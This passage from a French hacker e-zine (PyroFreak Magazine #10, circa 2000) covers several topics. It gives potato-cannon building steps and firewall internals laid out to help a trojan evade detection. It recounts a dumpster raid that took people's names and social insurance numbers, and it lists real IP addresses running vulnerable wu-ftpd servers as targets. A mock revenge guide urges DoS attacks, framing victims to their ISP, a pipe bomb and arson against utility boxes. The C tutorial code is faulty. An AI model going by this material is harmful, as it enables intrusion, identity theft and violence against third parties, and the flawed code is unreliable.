rgle: plus c'est gros mieux c'est! Les allumeurs de briquets sont 
franchement faiblards , les allume fourneaux sont assez bien , mais la 
Rolls des allumeurs reste l'allumeur de chaudire surpuissant. Les 
avantages d'un allumeur puissant sont de pouvoir mettre de la rallonge 
(allumer a 3 mtres c'est plus scurisant!) et d'avoir une combustion 
immdiate (pas de galre) . Pour introduire les lectrodes de l'allumeur 
on peut faire un trou de 9-10mm dans la chambre de combustion et 
etancheifier a la patafix ou faire juste des petits trous pour laisser 
passer les fils. Les lectrodes d' allumage (endroit ou l tincelle se 
produit ) sont 2 fils denuds  ou l'lectrode d' origine  ou bien un 
systme constitu avec un domino(sucre) et 2 aiguilles.
Attention dans certain cas la pulvrisation de laque sur les lectrodes 
empchent l tincelle de se produire.


4-Utilisation
 dcouper la patate en l'enfonant dans le canon (il peut tre ajust a 
cet effet) la patate doit tre bien ajuste:trop petite=pas 
d'tanchit;trop grande = rsistance a l'avancement , voire explosion 
de la chambre; la patate doit coulisser gras dans le canon. 
Assembler le canon dans le rducteur. ouvrir le couvercle puis vaporiser 
de l'arosol dedans ( j' utilise de la laque pour cheveux bon march) 
sachant que le butane coule dans l'air. La pulvrisation doit durer 
un peu moins de 2 secondes (3-4 pschit). Revisser rapidement. Durant les 
premiers allumages je conseille d'allumer a distance (rallonge de fils ) 
sur un support fixe aprs un peu d exprience le tir sur l' paule pourra 
tre envisag L ' allumage peut ne pas bien marcher , vrifier l 
tincelle et/ou mettre plus de gaz(une fois rgl le patator marche a 
tout les coups). Le lancement est accompagn d 'un grand bruit la patate 
vole trs loin et peut se pulvriser contre un mur.


5-Optimisation
ides a dvelopper pour optimiser le patator:
-allumeur puissant
-chambre de combustion avec plus de volume
-canon long (stri?)
-meilleur carburant (poudre??)
-patator en mtal soud (possibilit de mettre plus de pression)
-patator a propulsion magntique (ensemble d electro aimants pour envoyer des objets mtalliques a grande vitesse)

6-Conclusion
Voil de quoi procurer de grandes heures d' amusement . vous pouvez m' 
envoyer vos photos animations ainsi qu 'ides pour le develloppement du 
patator (pourquoi pas un site sur le TUNING du patator). Si vous 
souhaitez obtenir des photos conseils films numeriques MPEG ficuier 
patator 3dsmax contactez moi

essayer de devellopper au mieux ce sport!!!!!

ANARCHY RULEZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ



 ____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10
| 17-NetAppGuard
|( ) Phreak ( ) Hack (X) Autres
'.__________Par KAiAPhAS  ____ ________ goth.goth@caramail.com ______ ___

Pour commencer, c'est un programme qui controle tous les programmes qui
ont un accs  internet afin de reprer les trojans plus facilement. On
peut le  trouver sur  www.jcrun.com.


*** Fichiers :

    ** C:\WINDOWS\NAGWIN.EXE
       C'est le  programme  en  lui  mme  xcut  automatiquement  au 
       dmarrage.

    ** C:\WINDOWS\NAGCFG.DAT
       C'est  les donnes  concernant  les progs  accepts et  refuss, 
       c'est ce fichier qui nous interesse.


*** Base de registre :

    ** HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
       Cl : LoadNetAppGuard="c:\windows\nagwin.exe"
    
    ** HKEY_USERS\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
       Cl : LoadNetAppGuard="c:\windows\nagwin.exe"


*** Donnes :

    Le programme est limit  100 programmes accepts et 100 programmes
    refuss. Chaque chemin est limit  255 caractres.

    ** Programmes accepts :
       Ils sont dans les 25 premires lignes. il y en a un tous les 256
       caractres et chaque ligne contient 1024 caractres a fait donc
       4 programmes par ligne. Ils sont spars par des espaces.
       * 1er  caractre  :  correspond  au  code  ASCII  du  nombre  de 
         caractres de la chaine ki le suit et ki contient le chemin du
         programme accept.
       * Chaine de caractres : elle contient le chemin du prog.
       * Espaces vides : ils sont l pour combler afin d'avoir un bloc 
         de donnes bien ordonn qui fait toujours la mme taille.

    ** Programmes refuss :
       Ils sont  positionns exactement  de  la mme  manire  que  les 
       programmes  accepts  mis   part le fait  qu'il sont  placs   
       partir de la 26me ligne.


Le but de ces infomations est de crer un trojan qui se registrerait 
avant que le programme ne dtecte la prsence d'un protocol. La 
difficult est que le fichier nagcfg.dat est constement ouvert et qu'il
ne peut par consquent pas tre modifi  moins d'obliger le programme
 le fermer pendant un court instant... Avis aux programmeurs...


 ____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10
| 18-Trashing Report
|( ) Phreak ( ) Hack (X) Autres
'.__________Par Endrix________  ________  lordendrix@hotmail.com_____ ___


             !  ! !        !       !    !      !    ! !   !
              ! !! !   !  !   ! !!   ! !   !   !   !! ! !
                ! ! !  !   ! ! !  ! ! ! ! ! ! ! ! ! ! ! !
               !!!===================================!!!
                 !         [Trashing Report]         !!
                !!===================================!!
                 !===================================!
                !!Dans la nuit du 29-30* Fvrier 2000!!
                 !==================================!
                       Document crit par endrix-


Qui?: endrix-, Tekrebel, Vip0|a, System_exe, Kev0rkian
Destination?: #1, Luxembourg, #2, Cartier industriel  Hull, Vidotron
Heure?: de 12h00pm  2h30am


Bon, il est 11h00 et je dois aller au Vido Super Choix. J'attend, j'attend,
oh... Kevorkian arrive et j'embarque avec lui :) En arrivant au luxembourg 
Gatineau, il avait system_exe, tekrebel et vip qui nous attendais dehors  so
aprs avoir fait les prsentations, on est all  l'intrieur et on a  parl
de tout et de rien. Cependant il avait un petit manque  d'alcool  qui  a t
trs rapidement combl(prochain fois les boyz, on s'amne  plus d'argent..).
Pas longtemps aprs, tout le monde est ami et les discussions s'en vienne de
plus en plus profonde, moi et tekrebel parlons de thorie pour notre  cgep,
vip tant la tte de tout bord tout ct pour entendre  TOUT!!! Kevorkian  et
parle de tout et de rien   aussi. Aprs avoir parcourus   tout   les  sujets
possibles, nous partons tranquillement direction Cartier Industriel   Hull.
Cependant une chose manquait... ohh excusez, kevorkian vient de l'allumer...
Hey oui, encore une odeur d'herbe de jouvance pour nous redonner l'espoir de
trouver tout plein de belles choses :) Arriv, nous regardons tranquillement
pour voir si personne est la, ou si  les   copz nous  attendes  pas(on  sais
jamais).

On trouve une place pour stationner. Tout le monde sors, on prend nos lampes
de poches, on s'habille le plus noir possible(oui vip, ton manteau blanc est
trop vident). La marche commence... Nous passons par une  place    entre  2
immeubles qui donne aux trsors de vidotron. Nous pensons  ou pourrait
tre
les camras, comment s'y prendre ou aller... Aprs quelque  moment,  moi  et
Tekrebel dcidons d'y aller. Alors on va ce rfugier en arrire des 2 vannes
 la protection tes lumires et camras et les autres aprs suivent. Je vais
voir pour prendre un sac(en attendant,  kevorkian,  system_exe  et  tekrebel
font le guet et le vipola est rest en arrire pour le guet  distance  avec
sont beau Cache-cou mit comme une tuque ROUGE!

Peut aprs je reviens disant qu'il faut que quelqu'un vienne avec moi  parce
les sacs sont trop dans le fond et j'ai besoin d'une personne pour  soulever
le couvercle en attendant que j'entre dans la poubelle et que  je  prend  un
sac. Tekrebel ce porte volontaire pour venir avec  moi  m'aider  voyeusement
anceux de savoir ce qu'on va trouver. Tekrebel ouvre le couvercle,  j'entre
dans la poubelle, je prend le sac et on ce sauve en courrant :) On s'enva  
l'auto, tout le monde entre et Tekrebel nous attend avec  le  sac  dans  les
bras(euhh oui madame, c'est un projet de recherche cologique  pour  l'cole
que nous fesons..). On arrive, il entre le sac dans le char et on DCRISS!!!
Arriv au "spot" de dballage, tout le monde sors et on regarde voir ce  qui
est bon ou pas. On reste pas trop longtemps la parce que c'est proche du
park
et la GRC comment vous savez, c'est eux la police du park de la gatineau  et
ils passent souvent pour voir si le monde font des conneries.

Aprs avoir tout prit ce qui tait bon, on a finallement arrter au Tim
Horton
pour tout regarder concrtement ce qu'il y avait. Des noms, addresse, numro
d'assurance social, quelques users mais pas de #cc :(


C'est ainsi que c'est termin la soir du 29 au 30*.

Si vous habitez en Outaouais et vous aimeriez nous joindre c'est possible
maintenant, on pourrait y aller une gange de personne j'ai un   chum  qui
voudrait venir et qui a une vanne de 11 places so on a en masse  de place
pour du monde.

Simplement vous informer c'est quand le prochain Meeting et ou a une des
personnes suivantes :

endrix - System_exe - Tekrebel - Vip0|a - Kev0rkian - Neuro

Ou juste par email = lordendrix@hotmail.com
Via IRC            = Undernet, #pyrofreak
Via HTTP           = Http://www.pyrofreak.org


Je tiens aussi  remercier kev0rkian qui s'est offert cette fois pour
conduire... On va te remettre ca dude :)




endrix-(http://endrix.usuck.com)


 ____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10
| 19-DoS, wtfit (what the fuck is that)?
|( ) Phreak (X) Hack ( ) Autres
'.__________Par Tekrebel  ________ tekrebel@vl.videotron.ca  ______ ___


Introduction

        Avec les vnements des derniers mois, j'ai dcid d'crire un petit 
article pour expliquer en dtails ce que sont les denial of service attacks et 
la faon dont elles fonctionnent. Tout le monde a surement entendu parler des 
sites Yahoo, CNN, Amazon, Buy.com et j'en passe, qui ont t victime d'un DoS. 
Par exemple, Yahoo a reu 1 gig/s de donnes  un moment donn, ce qui a 
provoqu comme vous vous en doutez, la saturation complte de la bande passante. 
Aucun usager ne pouvait se connecter au site.

Qu'est-ce qu'un DoS et pourquoi?

        Comme le nom l'indique, un denial of service attack vise  empcher un 
serveur ou une machine d'offrir des services aux utilisateurs. On peut accomplir 
ceci de plusieurs faons, entre autre en saturant la bande passante, en 
exploitant un bug sur la machine et en la faisant "planter". Plusieurs logiciels 
(communment appels nukes) ou exploits nous permettent ceci. Exemple: teardrop, 
land, winnuke, smurf, pawk, pimp, et bien d'autres. J'expliquerai le 
fonctionnement gnral de ces programmes un peu plus tard. Le pourquoi des DoS 
est assez vident pour les compagnies, spcialement les commerces lectroniques. 
Quand le serveur ne peut offrir de services, la compagnie pert de l'argent. 
Prenons un petit scnario exagr mais quand mme plausible. Une compagnie X, 
disons Pyro-Bay Inc., veut se lancer dans le commerce lectronique, plus 
prcisment dans les enchres on-line. Malheureusement, le march est 
prsentement occup  90% par son concurrent, EBay. Pyro-Bay dcide donc 
d'engager et de fournir le matriel et les connections ncessaires  un groupe 
de hackers professionels. Ces hackers sont vraiment des pros et ne se feront pas 
retracer. Les hackers ou crackers (appelez les comme vous voulez), procdent 
donc  l'implantation de distributed attack trojans sur plusieurs centaines de 
machines sur une priode de trois mois. Ensuite, ayant bien planifis leur 
attaque, ils donnent le signal aux machines infectes de flooder ebay.com avec 
des paquets icmp, udp, tcp et autres. Ce qui suit est dsastreux pour EBay, le 
site est inaccessible aux clients pendant 2 semaines, les hackers tant trs 
bien prpars. Imaginez, l'argent que pert EBay pendant ces deux semaines. En 
plus, Pyro-Bay dcide de coordonner sa campagne de publicit massive en mme 
temps que les attaques. Coincidence? :) Avec les protocoles et l'architecture 
d'internet actuelle, toute compagnie ou organisation possdant la motivation et 
les ressources ncessaires, peut faire tomber  peu prs n'importe quel site 
indfiniment. Le FBI vous dira qu'ils ont dvelopp plein de techniques pour 
retracer les auteurs de ces attaques, c'est seulement vrai dans la mesure o les 
attaquants commettent des erreurs stupides et ne sont pas professionels. 
L'internet est une cible de choix pour ce type d'attaque, plus facile  
effectuer en gnral que hacker un serveur.

Quels sont les types de DoS?

        Je vais tenter de faire un rsum des principaux types de DoS. On les 
regroupe en deux catgories d'habitude: les DoS locaux ou remote (externe). 
C'est--dire, dans le cas d'un remote, le DoS s'effectue  partir d'un 
ordinateur externe au rseau. Dans le cas de celui local, il s'effectue sur le 
serveur comme tel, avec un compte sur la machine habituellement.
        
Attaques  distance (remote)

- ICMP flood

        C'est un des types de DoS les plus facile  excuter, il s'agit seulement 
d'avoir une connection internet plus rapide que celle de la victime. ICMP 
(internet control message protocol), est un protocole de communication utilis 
pour le diagnostic des erreurs et ne requiert pas de connection. Dans ce type 
d'attaque, on forge des paquets avec une adresse source diffrente (ou au 
hasard) et on les envoit  notre cible. En saturant la cible avec des paquets de 
64k ou une multitude de plus petits paquets, la machine  l'autre bout ne peut 
plus rpondre aux demandes de connections lgitimes des utilisateurs ou clients 
parce que toute la bande passante est utilise. On utilise la plupart du temps 
un paquet ICMP de type echo-request (ping) parce que le serveur qui reoit ce 
paquet doit y rpondre avec un echo-reply (pong). Il est possible de diminuer 
l'impact en deux de cette attaque en configuration un firewall pour bloquer les 
paquets ping mais certains services de diagnostics peuvent tre affects et si 
l'attaquant possde plus bandwidth, la machine est encore sature. Il existe une 
variante trs puissante  cette attaque, il s'agit du smurf. Non, ce n'est pas 
une attaque de petits bonhommes bleus. En fait, pour rsumer rapidement, avec le 
smurf, on gnre beaucoup plus de traffic que notre connection le permet. Le 
smurf se base sur le fait que certains routeurs sont mal configurs et rpondent 
 un ping par un nombre de pong gal au nombre de machines dans le subnet. Par 
exemple, si on a un routeur avec 50 machines derrire celui-ci, avec disons un 
bandwidth illimit et qu'on envoit pour 100k/s de ping, le routeur rpondra avec 
50x100k/s de pong, c'est  dire 5 meg/s. Une T1 ou un cble modem tombe 
facilement devant ce type d'attaque. C'est ce type de DoS qui a t employ 
contre Yahoo, combin avec un DDoS (Distributed Denial of Service). Les flood 
d'ICMPs sont assez difficiles  retracer puisque l'adresse source des paquets 
est forge.
        
- SYN flood

        Avant d'expliquer le SYN flood, il faut expliquer la base d'une connection 
TCP. Quand on initie une connection en TCP, on envoit un paquet SYN au serveur, 
qui lui nous rpond avec un ACK et nous par un SYN/ACK ensuite. C'est ce qu'on 
appele le 3way handshake. Le problme se situe dans le fait qu'un serveur va 
attendre le SYN/ACK un certains nombre de secondes avant de librer le socket. 
En falsifiant l'addresse source de notre paquet SYN, on peut envoyer quelques 
dizaines de paquets forgs et remplir la queue de connection de la victime. 
Celle-ci ne peut donc plus accepter d'autres connections avant que la queue soit 
vide. Le nombre de connections et le temps d'attenre avant un reset varie d'un 
serveur  un autre mais la queue n'est jamais trs longue (entre 10 et 20 
environ). Alors, on n'a pas besoin d'avoir beaucoup de bandwidth pour effectuer 
cette attaque puisqu'il faut juste envoyer une vingtaine de paquets  un 
intervalle correspondant au temps d'attente avant un reset de la connection. 
Plusieurs fournisseurs Internet ont t victime de ce type d'attaque, en 
particulier Panix.com qui a t hors d'usage pendant 2 semaines suite  un SYN 
flood.
        
- Les "nukes"

        Tout le monde doit connatre le clbre programme winnuke, qui fait (ou 
plutt qui faisait) planter les machines windows. Envoyer un nuke consiste  
envoyer un certains types de paquet, qui est mal gr par le systme 
d'exploitation et qui fait planter celui-ci. Ce type d'attaque exploite donc un 
bug dans le OS. C'est pour cette raison que d'habitude, ce type de DoS ne 
fonctionne pas trs longtemps parce que des patchs sont mis assez rapidement. 
Des exemples de nukes: teardrop, land, igmp.
        
- Les bugs dans les programmes

        On peut galement faire planter seulement certains services sur des ports 
si ceux-ci comportent des bugs, des buffer overflow notamment. Dans le cas d'un 
buffer overflow, on se connecte sur un des ports et on envoit plein de 
caractres, ce qui fait dborder le buffer et planter le programme. Il est 
galement possible d'excuter des commandes au niveau root avec un buffer 
overflow mais c'est une autre histoire. Par exemple, il y a un bug dans une 
version de war-ftp qui fait que quand on entre un username de plus de 255 
caractre, war-ftp plante. Une autre variante de ce type d'attaque mais au 
niveau hardware se retrouve chez les vieux modems o en envoyant un ping avec 
ath+++ et un paramtre demandant  la victime de retourner le pong avec 
l'information contenue dans celui-ci, cause la dconnection du modem. ath+++ est 
la commande utilise pour se dconnecter avec un modem. Vous voyez le principe? 
On peut faire dconnecter n'importe qui qui a ce type de vieux modem. Il y a une 
liste quasi illimite de ce type de bugs, regardez  
http://www.attrition.org/security/denial/
        
Attaques locales

- Les forks

        Plutt reconnu sur les plateformes UNIX, ce DoS consiste  crer une 
multitude de process sur la machine afin de consumer toutes les ressources 
disponibles et ralentir l'ordinateur. Un bon forker, tel superforker, empche 
mme l'admin de liste le contenu d'un rpertoire ou d'excuter n'importe quelle 
commande de base. La parade  ce type d'attaque est relativement simple, il 
s'agit de limiter les usagers du serveur  un certain nombre de process. 
D'habitude, un usager normal ne devrait jamais dpasser une centaine de process 
 la fois.
        
- L'espace du disque dur

        Cette attaque peut galement s'effectuer  distance, avec des cgi-bin 
scripts qui crivent sur le disque dur par exemple. C'est trs simple, il s'agit 
de remplir le disque dur de notre ennemi avec plein de cochonneries. Bien que 
l'administrateur peut mettre des quotas sur les usagers, certains bugs dans des 
programmes roulant en UID0 ou au niveau admin permettent d'exploiter cette 
faiblesse. Il faut aussi se souvenir que la plupart des systmes de fichiers, si 
non tous, utilise un certain minimum d'espace sur le disque pour stocker 
n'importe quel fichier. Par exemple, sur Linux, la grosseur d'un inode par 
dfaut est 4096 bytes si je me rappele bien. Alors, si nous crons 1000 petits 
fichiers de 1 byte de long, ils utiliseront quand mme 1000 x 4096 bytes, c'est-
-dire 4,096,000 bytes. Ceci permet de remplir un gros disque assez rapidement 
puisque l'on a pas  crire quelques gigs pour remplir un disque de 20 gigs. Le 
programmes mal configurs qui log (comme les firewalls), sont souvent la cause 
d'un remplissage de disque quand un attaquant provoque dlibrment des messages 
d'erreurs afin de remplir un disque.

Conclusion

        Bon, j'espre que cet article vous a plu sinon too bad, vous venez juste 
de waster 5 minutes de votre vie. Je crois que j'ai fait le tour des DoS dont on 
entend le plus parler. Restez  l'coute des nouveaux DoS car ils en sort  la 
tonne alors si vous avez un serveur connect  Internet, il serait bon de 
vrifier si votre machine est bien configure pour liminer ce type d'attaque. 
Je n'ai pas parl de chaque DoS en particulier parce que sinon on serait encore 
l dans 3 semaines alors ne venez pas me bugger que je n'ai pas parl de winnuke 
version 2.4 lamer edition.

 ____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10
| 20-Initiation au C sous linux
|( ) Phreak ( ) Hack (X) Autres
'.__________Par Putois  ____ ________ asmbeginer@multimania.com ______ ___

1] Comment faire des programmes du type: myprog hello

On vois beaucoup sur le web des programmes C,avec plusieur options par 
exemple les scanners de ports ou la syntaxe est: portscan <host> <port>:


#include <stdio.h>

void main(int argc,char *argv[])
{
 int test;
 
if (argc < 2 )
{
 printf("usage: exemple test",argv[0]);
 exit(-1);
}
 
if (!(test))
{
 printf("this ok");
 exit(-1);
}
}


Cette ligne if (!(test)) demande au compilateur de retourner sous le shell
et de voir si on a taper la commande test . A noter que chaque fonctions
que l'on veut rajouter doit tre initialiser par un type INT au debut du
code. Compilation:cc -o exemp exemp.c

Execution: bash#> ./exemp test

if (!(test))
{
 printf("this ok");
 exit(-1);
}

Un autre exemple:


#include <stdio.h>

void main(int argc,char *argv[])
{
 int test;
 int test2;
 int test3;
 
if (argc < 2 )
{
 printf("usage: exemple test",argv[0]);
 exit(-1);
}
 
if (!(test))
{
 printf("this ok");
 exit(-1);
}

if (!(test2))
{
 printf("test 2 this ok");
 exit(-1);
}

if (!(test3))
{
 printf("test 3 this ok");
 exit(-1);
}
}

Compilation:cc -o exemple2 exemple2.c

Usage: ./exemple2 test marquera this ok a l'ecran
Usage: ./exemple2 test2 marquera test2 this ok a l'ecran
Usage: ./exemple2 test3 marquera test3 this ok a l'ecran

1.2] Les branchements slectifs avec SWITCH
Le but de la fonction Switch est de permettre de travailler avec plusieurs
fonctions Void.
Principe:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>


main(){
}

void  essai()
{
}

void test()
{
}

Programme qui ne sert  rien sauf qu'a dmontrer l'algorythme simple pour
crr ses propres VOID.
Afin de pouvoir appeller la sous fonction essai() le SWITCH doit etre cr
 l'intrieur de main():

main(){
char c;

switch(c){
default: fprintf(stderr,"Usage: -a  -b\n");
  exit(2);
}

} 

A son xcution ce programme marquera: Usage: -a -b,le but de cet exemple
et de faire un code de type:
./exemple3 -a .La sous fonction essai() doit tre initialiser au dbut du
 source avant la fonction main()
Le programme se transforme donc comme ceci:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void essai(); 

main(){
char c;

switch(c){

  case 'a' : essai(); /*appel dela fonction essai()/*     
     break;

  default: fprintf(stderr,"Usage: -a  -b\n");
  exit(2);
}
}   
   
void  essai()

{
 
}


void test()
{
}




2] Une tentative pour simplifier la commande chmod

L'idal serait de crer un programme avec divers fonctions pour simplifier
la lourd commande CHMOD
L'exemple 4 nous dmontre comment utiliser la programmation des i-noeud,
il crr un rpertoir /test dans le directory courant:

#include <sys/types.h>
#include <sys/stat.h>
main(){

mode_t mode;
mode = S_IRUSR|S_IWUSR|S_IXUSR|S_IXGRP|S_IRGRP|S_IROTH|S_IXOTH;
if(mkdir("test",mode) == -1);
    perror("Creation:");
}

Compilation: cc -o exemple3 exemple3.c,donc le repertoire /test est crr,
un message de russite est renvoy automatiquement par linux./test est 
galement accessible par n'importe quel utilisateur. On peut le vrifier
avec la commande ls -l,exemple3 a fait un chmod r+w+x+x+r+r+x /test.

 ____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10
| 21-sCAN pAR eNDRIX
|( ) Phreak (X) Hack ( ) Autres
'.__________Par Endrix________  ________  fbasoft@yahoo.com ______ ___


Unix FTP Server wu-2.4.2-acadam
Beta 15, Beta 18

Outil n'cessaire, wuftpd exploit.

amusez-vous :)

24.218.255.191:21: 220 daniel.hawke.org FTP server (Version
wu-2.4.2-academ[BETA
24.200.0.153:21: 220 Panthere FTP server (Version
wu-2.4.2-academ[BETA-15](1) Sa
24.200.11.90:21: 220 steph.excalior.net FTP server (Version
wu-2.4.2-academ[BETA
24.200.14.55:21: 220 linux1.sillyweb.sil FTP server (Version
wu-2.4.2-academ[BET
24.200.22.251:21: 220 pluton.imtel.com FTP server (Version
wu-2.4.2-academ[BETA-
24.200.25.174:21: 220 dimsboiv.maison FTP server (Version
wu-2.4.2-academ[BETA-
24.200.61.96:21: 220 localhost FTP server (Version
wu-2.4.2-academ[BETA-18](1) M
24.200.61.192:21: 220 ysidea.dyndns.org FTP server (Version
wu-2.4.2-academ[BETA
24.200.68.144:21: 220 modemcable144.68-200-24.mtl.mc.videotron.net FTP
server (Version wu-2.4.2-academ[BETA-15]
24.200.69.139:21: 220 kostanza.dyn.ml.org FTP server (Version
wu-2.4.2-academ[BE
24.200.71.167:21: 220 server FTP server (Version wu-2.4.2-VR17(1)
24.200.73.131:21: 220 tw.fdns.net FTP server (Version wu-2.5.0(1) Tue Sep 21
16:
24.200.74.56:21: 220 gilker FTP server (Version wu-2.4.2-academ[BETA-18](1)
Mon
24.200.76.168:21: 220 Serveur1.videotron.ca FTP server (Version
wu-2.4.2-academ[
24.200.78.151:21: 220 master FTP SERVER  (Version wu-2.4.2-academ[BETA-18]
24.200.83.196:21: 220 demi.dhs.org FTP server (Version wu-2.6.0(1) Thu Oct
21 12
24.200.85.59:21: 220 moose.nodomain.nowhere FTP server (Version
wu-2.4.2-VR17(1)
24.200.89.40:21: 220 DB-Srv.cognat.com FTP server (Version
wu-2.4.2-academ[BETA-
24.200.94.5:21: 220 caribou.dyns.cx FTP server (Version wu-2.4.2-VR17(1) Mon
Apr
24.200.99.160:21: 220 peter FTP server (Version wu-2.4.2-VR17(1) Mon Apr 19
09:2
24.200.100.113:21: 220 merlin FTP server (Version wu-2.4.2-VR17(1) Mon Apr
19 09
24.200.101.174:21: 220 localhost FTP server (Version wu-2.4.2-VR17(1) Mon
Apr 19
24.200.102.10:21: 220 tower.imperators.com FTP server (Version
wu-2.4.2-academ[B
24.200.104.117:21: 220 stas.fulcrum.net FTP server (Version wu-2.4.2-VR17(1)
Mon


 ____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10
| 22-Faire chier un trou du cul  la leet
|( ) Phreak ( ) Hack (X) Autres
'.__________Par Tekrebel  ________ tekrebel@vl.videotron.ca  ______ ___


        Hey les dudes, vous voulez vraiment faire chier quelqu'un parce
qu'il vous a nick votre blonde, ou a rit de vous sur #outaouais ou 
#montreal? Ou encore ce nerd  la con  votre cole qui se vante d'utiliser
netbus et d'avoir hacker le fbi? Et bien lisez ce qui suit, c'est dans 
votre intrt, vous serez une techno-terreur, un cyber thug, une super
menace aprs avoir apris tout ce qui trouve dans cet article. Les combat 
mains nues dans la vrai vie c'est pour les nuls, le cyberespace et le monde
de l'lectron a c'est comme dirait un gars dans IGA, le cyber bronx. Assez 
de bavardage et passons tout de suite au briefing.
        
Un petit avant got de destruction, les floods

        Tout les cools de l'internet savent ce qu'est un flood, une 
inondation comme on dit en bon franais. T'as qu' te hacker une oc3 et tu
pte la gueule au bandwidth de ton ennemi les deux doigts dans le nez en 
criant ciseaux. Et si le mec est du genre dur  cuir "j'ai un modem cble
et je download du porn . 500k/s en me shaftant" et bien l tu lui balance
un smurf, a devrait suffire pour lui donner une frousse bleue et le
convaincre de ne plus venir embter ta cyber nana.
        
Attention aux radiations, les nukes

        Ouaaisss... les nukes, l'arme absolue des vrai destructeurs. 
 manipuler avec soin si on ne veux pas se taper un leak de plutonium dans
son ordi. Seuls les vrais pros du cyber fighting savent se servir de ces 
petits joujous . l'apparence innofensive. Cet emmerdeur d'irc cop va en
manger toute une. OOB, Teardrop, un petit land combin avec un double igmp
et pif, ce petit aoleur vient de se retrouver triple KO. Encore une victoire
pour coolhacker14, maitre incontest des armes nuclaires et biochimiques 
de l'internet.

Pour les oprations un peu plus dlicates

        Bon, le mec s'est tap un firewall, ou un coupe-feu bastion comme 
disent les mecs de z tl. T'affole pas, ce putain d'enfouar n'est pas 
l'abri. Parfois mieux vaut tre srieux et viter des ennuis en y allant de 
la vrai manire leet, le social engineering et les petits crosses 
lectroniques. Ouais et bien le con il est sur Vidotron ou tout autre isp  ip
statique? Pas de problme, crache quelques port scan forgs avec son ip sur
les serveurs de son isp et sur toi mme. Ensuite, fait comme les trouillards
et envoit un petit courriel . Bill "le couch fucker", admin de Vidosuce.
Et hop! En moins de deux, le mec se fait couper sa connection et devra
s'expliquer avec ses parents qui auront reu un petit appel d'plaisant de
notre cher Bill.
        
Cette section s'adresse aux super commandos masqus

        Attention, seuls les vrais killers, prts . risquer le tout pour le tout 
doivent lire ce qui suit! Quand il s'agit de de venger contre un vrai con, 
vraiment dans le genre siphoneur de sphyncteur ou encore rectum rider, il faut 
procder de la manire expditive et efficace: couper la ligne manuellement.
Haha, l'idiot ne se dote surement pas qu'avec tes talents de uberhacker,
tu t'es tap son dossiers sur son ip. Bon, tu attend que tes parents aient
fini d''couter le petit tracteur des arpents verts ou tout autre mission 
pour vieux dbile, et tu te trimbale jusque chez le dude. Les vrais elites
grimpent aux poteaux d'hydro et largue une pipe bomb dans la boite mais bon,
si le mec vit dans ce quartier riche aux maisons de 200 000 et aux lignes 
souterraines et bien tu peux toujours faire chier bell et le gars en ouvrant
ces petits boites brunes et en foutant le feu dedans. Et juste avant de 
partir, tu lui slash ses tires.
        
        Et bien, ceci conclu un autre merveilleux article du seul vrai 
hacker, le maitre du ct obscur et gardien de la citadle de Delroth, j'ai
nomm, moi-mme, tekrebel. Alors amusez vous bien avec ces techniques et
souvenez vous: les nukeurs seront un jour les maitres de l'internet et les
faibles seront flanqus avec les trous du cul de AOL.
        
P.S.: Au cas o vous tiez trop cons, cet article est une joke et la qualit
du franais est intentionellement laisse de ct. Nuke on!



 ____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10
| 23-Exploit altavista et Cash bar!  
|( ) Phreak (X) Hack ( ) Autres
'.__________Par cyberrider________  ________  cyberride@hotmail.com ___
                             A.K.A DeREkTom


	Salut tous, dernirement jai fait 2 progs pour vous aider  crosser
altavista et Cash Bar ! Dans l'article qui va suivre, je vais vous expliquer
le fonctionnement de c'est 2 programmes (Aller voir sur le site de PyroFreak
dans les progz "Www.PyroFreak.Org" pour vous les procurs).
-total3.exe 
-adshelp.exe


	Commenons par le total3.exe qui est total liberty 3.0 , il sert 
cacher la bar de altavista quand l'on surf! Il est tout simple, mais j'ai 
mit un numro de srie , je sais pas pourquoi mais bon!

  Ouvrez le programme, il vous copie collera le numro de srie directement
dans le clipboard, donc vous n'avez qu' me le ctrl + v dans icq (1322337).
Ensuite que je vous aurez envoy le petit serial,  vous n'avez qu' le
rentrer aprs le OK.


Il va y avoir une petite bar de text qui va apparatre, tapper le serial et
le programme va maintenant fonctionner!

Comment s'en servir!

 C'est assez simple! Alors vous tes offline! vous clicker sur connect le
programme va vous connecter automatiquement et va fermer la bar! oui oui
la fermer! Vous pourrez rester online tout le temps sans que la banner
refresh le timer le click toute!  


 Pour vous dconnecter,  aller vous dconnecter normallement sur la systray
sur le petit modem et ensuite sur le programme ou l'un avant l'autre, ca pas
d'importance, mais il faut faire les 2! ;)

C'est assez simple et pratique comme programme. Il fait tous  votre place!!
enjoy this soft by CyberRider!

Ensuite pour mon autre programme (adshelp.exe) faite autant  la press que
cet article, il est simple d'usage poser votre curseur devant l'object ou
la fenetre desir, regarder le handle et retener le dans votre tete 
(pourquoi le prog le retien pas ? bin pour que vous vous pensiez hacker:))
Ensuite vous aller dans le menu et selectionner le mode que vous voulez kill
hide capsulate hide!  Normalement capsulate hide est capable de cacher
n'importe koi!! Cela depend des programmes ou de l'endroit que vous clicker ;))

Wow dj fini cet article  la butch, j'espre que vous aller apreciez mes 
2 petits softs!


Question normallement poses:

Pourquoi quand je me connect sur altavista sa dit qu'il est deja laoder?
C'est parce que tu t'est mal dconnecter! click sur disconnect dans le prog 
avant!

Pourquoi quand je fait capsulate hide sa marche pas?
Tu clcik mal ou bien que le prog neccessite un bon cracker ;)

D'autres questions:

cyberride@hotmail.com
icq : 1322337
sur irc : DerekTom

Pour les serials, contactez moi sur irc "derektom" ou sur icq "1322337".

Merci 
CyberRider A.K.A DerekTom


 ____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10
| 24-ISOm \\'aReZ & MP3   (Partie 3)
|( ) Phreak ( ) Hack (X) Autres
'._______Par Vip0|a ____________________ ______ vipola@pyrofreak.org ___



Voici une suite de mes prcdants arcticles..
j'avais d'autres notions  vous enseign donc
je ne vous avais parl dans les 2 parties prcdantes.

OverBurn:

